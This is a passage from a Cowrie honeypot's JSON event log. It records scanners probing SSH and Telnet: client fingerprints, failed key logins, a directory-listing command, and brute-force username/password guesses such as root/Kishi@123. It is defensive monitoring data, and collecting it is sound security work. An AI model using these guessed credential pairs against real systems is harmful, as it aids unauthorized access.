92-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f1e5e9d24e5e345e8745613bde22d532","sensor":"my-vps","timestamp":"2025-08-26T04:21:02.897433Z","src_ip":"139.19.117.131","session":"3b1586ca721b"}
{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"ee:a5:9b:eb:05:ee:d6:5a:d1:2d:46:79:7e:db:1a:15","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDLd9f2zbiAa6FAkjEaGTECuKumLkjbk2aWObeVXF3Wp+ngAEdPmP75yJM6WTEs/FXtlEJXMbqJMOr6JDwDY6kN3Q6Cea6Ry95ZttWjAP/BmnT7pf+vsi4svFqyLHh6ywLb7neqR1/9EDJFAYm0DcrrJ56ZkOWdTB5RxEY6C04GpWKxB6pRW8DqrW6lAMiRSSMAfvkxeexFyZoqiUoh5MdwfS7wsKdHJtakxH+5qP4mPrEW/dcRFrYz95yyyZtHK5Qxopom1YyyCAi8P388frK6K8Rq3yWTaFpbiA0FerRDTyDKZ5qFEwbAkg4GH0RXap3PbdQTcOrlDHIkylqCviAx","type":"ssh-rsa","message":"public key attempt for user root of type ssh-rsa with fingerprint ee:a5:9b:eb:05:ee:d6:5a:d1:2d:46:79:7e:db:1a:15","sensor":"my-vps","timestamp":"2025-08-26T04:21:02.938423Z","src_ip":"139.19.117.131","session":"3b1586ca721b"}
{"eventid":"cowrie.login.failed","username":"root","fingerprint":"ee:a5:9b:eb:05:ee:d6:5a:d1:2d:46:79:7e:db:1a:15","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDLd9f2zbiAa6FAkjEaGTECuKumLkjbk2aWObeVXF3Wp+ngAEdPmP75yJM6WTEs/FXtlEJXMbqJMOr6JDwDY6kN3Q6Cea6Ry95ZttWjAP/BmnT7pf+vsi4svFqyLHh6ywLb7neqR1/9EDJFAYm0DcrrJ56ZkOWdTB5RxEY6C04GpWKxB6pRW8DqrW6lAMiRSSMAfvkxeexFyZoqiUoh5MdwfS7wsKdHJtakxH+5qP4mPrEW/dcRFrYz95yyyZtHK5Qxopom1YyyCAi8P388frK6K8Rq3yWTaFpbiA0FerRDTyDKZ5qFEwbAkg4GH0RXap3PbdQTcOrlDHIkylqCviAx","type":"ssh-rsa","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-26T04:21:02.939468Z","src_ip":"139.19.117.131","session":"3b1586ca721b"}
{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"ee:a5:9b:eb:05:ee:d6:5a:d1:2d:46:79:7e:db:1a:15","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDLd9f2zbiAa6FAkjEaGTECuKumLkjbk2aWObeVXF3Wp+ngAEdPmP75yJM6WTEs/FXtlEJXMbqJMOr6JDwDY6kN3Q6Cea6Ry95ZttWjAP/BmnT7pf+vsi4svFqyLHh6ywLb7neqR1/9EDJFAYm0DcrrJ56ZkOWdTB5RxEY6C04GpWKxB6pRW8DqrW6lAMiRSSMAfvkxeexFyZoqiUoh5MdwfS7wsKdHJtakxH+5qP4mPrEW/dcRFrYz95yyyZtHK5Qxopom1YyyCAi8P388frK6K8Rq3yWTaFpbiA0FerRDTyDKZ5qFEwbAkg4GH0RXap3PbdQTcOrlDHIkylqCviAx","type":"ssh-rsa","message":"public key attempt for user root of type ssh-rsa with fingerprint ee:a5:9b:eb:05:ee:d6:5a:d1:2d:46:79:7e:db:1a:15","sensor":"my-vps","timestamp":"2025-08-26T04:21:02.959693Z","src_ip":"139.19.117.131","session":"3b1586ca721b"}
{"eventid":"cowrie.login.failed","username":"root","fingerprint":"ee:a5:9b:eb:05:ee:d6:5a:d1:2d:46:79:7e:db:1a:15","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDLd9f2zbiAa6FAkjEaGTECuKumLkjbk2aWObeVXF3Wp+ngAEdPmP75yJM6WTEs/FXtlEJXMbqJMOr6JDwDY6kN3Q6Cea6Ry95ZttWjAP/BmnT7pf+vsi4svFqyLHh6ywLb7neqR1/9EDJFAYm0DcrrJ56ZkOWdTB5RxEY6C04GpWKxB6pRW8DqrW6lAMiRSSMAfvkxeexFyZoqiUoh5MdwfS7wsKdHJtakxH+5qP4mPrEW/dcRFrYz95yyyZtHK5Qxopom1YyyCAi8P388frK6K8Rq3yWTaFpbiA0FerRDTyDKZ5qFEwbAkg4GH0RXap3PbdQTcOrlDHIkylqCviAx","type":"ssh-rsa","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-26T04:21:02.960617Z","src_ip":"139.19.117.131","session":"3b1586ca721b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T04:21:07.626044Z","src_ip":"107.189.19.100","session":"4bfa4dba2895"}
{"eventid":"cowrie.command.input","input":"ls -la /","message":"CMD: ls -la /","sensor":"my-vps","timestamp":"2025-08-26T04:21:07.626846Z","src_ip":"107.189.19.100","session":"4bfa4dba2895"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/352110e27ca54240da15349cfe3b896942c0edeb85990b5868f21c885813869f","size":1347,"shasum":"352110e27ca54240da15349cfe3b896942c0edeb85990b5868f21c885813869f","duplicate":false,"duration":"2.4","message":"Closing TTY Log: var/lib/cowrie/tty/352110e27ca54240da15349cfe3b896942c0edeb85990b5868f21c885813869f after 2.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:21:10.046301Z","src_ip":"107.189.19.100","session":"4bfa4dba2895"}
{"eventid":"cowrie.session.closed","duration":"10.0","message":"Connection lost after 10.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:21:12.878956Z","src_ip":"139.19.117.131","session":"3b1586ca721b"}
{"eventid":"cowrie.session.closed","duration":"29.5","message":"Connection lost after 29.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:21:13.099105Z","src_ip":"107.189.19.100","session":"4bfa4dba2895"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49873,"dst_ip":"1.2.3.4","dst_port":22,"session":"666c784ace20","protocol":"ssh","message":"New connection: 212.227.235.229:49873 (1.2.3.4:22) [session: 666c784ace20]","sensor":"my-vps","timestamp":"2025-08-26T04:21:14.068839Z"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:21:14.986536Z","src_ip":"212.227.235.229","session":"666c784ace20"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51242,"dst_ip":"1.2.3.4","dst_port":22,"session":"56cdddab419f","protocol":"ssh","message":"New connection: 212.227.235.229:51242 (1.2.3.4:22) [session: 56cdddab419f]","sensor":"my-vps","timestamp":"2025-08-26T04:21:16.151910Z"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:21:16.720790Z","src_ip":"212.227.235.229","session":"56cdddab419f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53184,"dst_ip":"1.2.3.4","dst_port":22,"session":"26f71f8d2098","protocol":"ssh","message":"New connection: 212.227.235.229:53184 (1.2.3.4:22) [session: 26f71f8d2098]","sensor":"my-vps","timestamp":"2025-08-26T04:21:19.086303Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:21:19.087330Z","src_ip":"212.227.235.229","session":"26f71f8d2098"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:21:19.364304Z","src_ip":"212.227.235.229","session":"26f71f8d2098"}
{"eventid":"cowrie.login.failed","username":"ammar","password":"ammar","message":"login attempt [ammar/ammar] failed","sensor":"my-vps","timestamp":"2025-08-26T04:21:20.512919Z","src_ip":"212.227.235.229","session":"26f71f8d2098"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:21:21.792764Z","src_ip":"212.227.235.229","session":"26f71f8d2098"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54461,"dst_ip":"1.2.3.4","dst_port":22,"session":"bd858e47ede5","protocol":"ssh","message":"New connection: 212.227.235.229:54461 (1.2.3.4:22) [session: bd858e47ede5]","sensor":"my-vps","timestamp":"2025-08-26T04:21:22.651784Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.7.4","message":"Remote SSH version: SSH-2.0-libssh_0.7.4","sensor":"my-vps","timestamp":"2025-08-26T04:21:24.639103Z","src_ip":"212.227.235.229","session":"bd858e47ede5"}
{"eventid":"cowrie.client.kex","hassh":"e37f354a101aff5871ba233aa82b84ec","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss"],"encCS":["aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: e37f354a101aff5871ba233aa82b84ec","sensor":"my-vps","timestamp":"2025-08-26T04:21:25.568360Z","src_ip":"212.227.235.229","session":"bd858e47ede5"}
{"eventid":"cowrie.session.closed","duration":"5.4","message":"Connection lost after 5.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:21:28.033574Z","src_ip":"212.227.235.229","session":"bd858e47ede5"}
{"eventid":"cowrie.session.connect","src_ip":"103.217.145.104","src_port":34266,"dst_ip":"1.2.3.4","dst_port":22,"session":"8f3806c647c6","protocol":"ssh","message":"New connection: 103.217.145.104:34266 (1.2.3.4:22) [session: 8f3806c647c6]","sensor":"my-vps","timestamp":"2025-08-26T04:22:17.902785Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:22:17.903767Z","src_ip":"103.217.145.104","session":"8f3806c647c6"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:22:18.164680Z","src_ip":"103.217.145.104","session":"8f3806c647c6"}
{"eventid":"cowrie.login.failed","username":"usdt","password":"123","message":"login attempt [usdt/123] failed","sensor":"my-vps","timestamp":"2025-08-26T04:22:19.250949Z","src_ip":"103.217.145.104","session":"8f3806c647c6"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:22:20.513193Z","src_ip":"103.217.145.104","session":"8f3806c647c6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55296,"dst_ip":"1.2.3.4","dst_port":22,"session":"0762d72ec1dd","protocol":"ssh","message":"New connection: 212.227.235.229:55296 (1.2.3.4:22) [session: 0762d72ec1dd]","sensor":"my-vps","timestamp":"2025-08-26T04:22:35.488103Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:22:35.488827Z","src_ip":"212.227.235.229","session":"0762d72ec1dd"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:22:35.766333Z","src_ip":"212.227.235.229","session":"0762d72ec1dd"}
{"eventid":"cowrie.login.failed","username":"zhangfeng","password":"zhangfeng","message":"login attempt [zhangfeng/zhangfeng] failed","sensor":"my-vps","timestamp":"2025-08-26T04:22:36.915003Z","src_ip":"212.227.235.229","session":"0762d72ec1dd"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:22:38.194707Z","src_ip":"212.227.235.229","session":"0762d72ec1dd"}
{"eventid":"cowrie.session.connect","src_ip":"3.131.215.38","src_port":40462,"dst_ip":"1.2.3.4","dst_port":23,"session":"422f1c983507","protocol":"telnet","message":"New connection: 3.131.215.38:40462 (1.2.3.4:23) [session: 422f1c983507]","sensor":"my-vps","timestamp":"2025-08-26T04:22:41.675447Z"}
{"eventid":"cowrie.session.closed","duration":0.3379943370819092,"message":"Connection lost after 0 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:22:42.013371Z","src_ip":"3.131.215.38","session":"422f1c983507"}
{"eventid":"cowrie.session.connect","src_ip":"3.131.215.38","src_port":40488,"dst_ip":"1.2.3.4","dst_port":23,"session":"eb7bb080e803","protocol":"telnet","message":"New connection: 3.131.215.38:40488 (1.2.3.4:23) [session: eb7bb080e803]","sensor":"my-vps","timestamp":"2025-08-26T04:22:42.599589Z"}
{"eventid":"cowrie.login.failed","username":"GET / HTTP/1.1","password":"Host: 1.2.3.4:23","message":"login attempt [GET / HTTP/1.1/Host: 1.2.3.4:23] failed","sensor":"my-vps","timestamp":"2025-08-26T04:22:42.600731Z","src_ip":"3.131.215.38","session":"eb7bb080e803"}
{"eventid":"cowrie.login.failed","username":"User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36","password":"Accept: */*","message":"login attempt [User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36/Accept: */*] failed","sensor":"my-vps","timestamp":"2025-08-26T04:22:42.601493Z","src_ip":"3.131.215.38","session":"eb7bb080e803"}
{"eventid":"cowrie.login.failed","username":"Accept-Encoding: gzip","password":"","message":"login attempt [Accept-Encoding: gzip/] failed","sensor":"my-vps","timestamp":"2025-08-26T04:22:42.602306Z","src_ip":"3.131.215.38","session":"eb7bb080e803"}
{"eventid":"cowrie.session.closed","duration":0.1232295036315918,"message":"Connection lost after 0 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:22:42.722750Z","src_ip":"3.131.215.38","session":"eb7bb080e803"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57732,"dst_ip":"1.2.3.4","dst_port":22,"session":"216858217c76","protocol":"ssh","message":"New connection: 212.227.235.229:57732 (1.2.3.4:22) [session: 216858217c76]","sensor":"my-vps","timestamp":"2025-08-26T04:22:55.695220Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:22:55.696449Z","src_ip":"212.227.235.229","session":"216858217c76"}
{"eventid":"cowrie.session.connect","src_ip":"45.88.8.215","src_port":34182,"dst_ip":"1.2.3.4","dst_port":22,"session":"6edbb69b84b4","protocol":"ssh","message":"New connection: 45.88.8.215:34182 (1.2.3.4:22) [session: 6edbb69b84b4]","sensor":"my-vps","timestamp":"2025-08-26T04:22:56.578734Z"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:22:56.787844Z","src_ip":"212.227.235.229","session":"216858217c76"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T04:22:56.846545Z","src_ip":"45.88.8.215","session":"6edbb69b84b4"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T04:22:56.847268Z","src_ip":"45.88.8.215","session":"6edbb69b84b4"}
{"eventid":"cowrie.login.success","username":"root","password":"Kishi@123","message":"login attempt [root/Kishi@123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T04:22:58.454281Z","src_ip":"45.88.8.215","session":"6edbb69b84b4"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:22:58.758998Z","src_ip":"45.88.8.215","session":"6edbb69b84b4"}
{"eventid":"cowrie.session.connect","src_ip":"93.123.109.181","src_port":46942,"dst_ip":"1.2.3.4","dst_port":22,"session":"6af1cf2f69a2","protocol":"ssh","message":"New connection: 93.123.109.181:46942 (1.2.3.4:22) [session: 6af1cf2f69a2]","sensor":"my-vps","timestamp":"2025-08-26T04:23:09.332568Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T04:23:09.333365Z","src_ip":"93.123.109.181","session":"6af1cf2f69a2"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T04:23:09.352542Z","src_ip":"93.123.109.181","session":"6af1cf2f69a2"}
{"eventid":"cowrie.login.failed","username":"solv","password":"solv","message":"login attempt [solv/solv] failed","sensor":"my-vps","timestamp":"2025-08-26T04:23:09.412580Z","src_ip":"93.123.109.181","session":"6af1cf2f69a2"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:23:10.434417Z","src_ip":"93.123.109.181","session":"6af1cf2f69a2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54550,"dst_ip":"1.2.3.4","dst_port":22,"session":"c98a63b87ea6","protocol":"ssh","message":"New connection: 212.227.235.229:54550 (1.2.3.4:22) [session: c98a63b87ea6]","sensor":"my-vps","timestamp":"2025-08-26T04:23:25.426826Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:23:25.427898Z","src_ip":"212.227.235.229","session":"c98a63b87ea6"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@